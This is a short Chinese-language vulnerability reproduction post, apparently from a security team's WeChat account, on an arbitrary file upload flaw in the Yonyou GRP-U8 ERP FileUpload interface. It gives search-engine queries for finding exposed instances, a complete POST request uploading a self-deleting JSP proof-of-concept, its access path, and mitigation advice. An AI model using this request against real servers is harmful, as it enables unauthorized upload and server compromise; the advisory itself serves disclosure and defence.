产品简介
用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。
漏洞描述
用友GRP-U8 FileUpload 接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
网络空间测绘
Fofa
product="用友-GRP-U8"
Hunter
web.icon=="b41be1ccc6f9f2894e0cfcf23acf5fc0
Quake
app:"用友GRP-U8"
漏洞复现
POST/servlet/FileUpload?fileName=6DHYwVmg.jsp&actionID=update HTTP/1.1Host:127.0.0.1User-Agent:Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1;SV1;QQDownload732;.NET4.0C;.NET4.0E)Content-Length:129Cache-Control:max-age=0Content-Type:text/plain;charset=utf-8Dnt:1Origin:nullUpgrade-Insecure-Requests:1Accept-Encoding:gzip,deflate,brConnection:close
<%out.println("DxgWjzgwV5248gzi9aC1m6XeFryQhlwq");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
访问地址:/R9iPortal/upload/6DHYwVmg.jsp
修复建议
1、如⾮必要,禁⽌公⽹访问该系统。
2、通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。
3、升级产品到最新版本
原文始发于微信公众号(凝聚力安全团队):【漏洞复现】用友 GRP-U8 FileUpload 任意文件上传漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论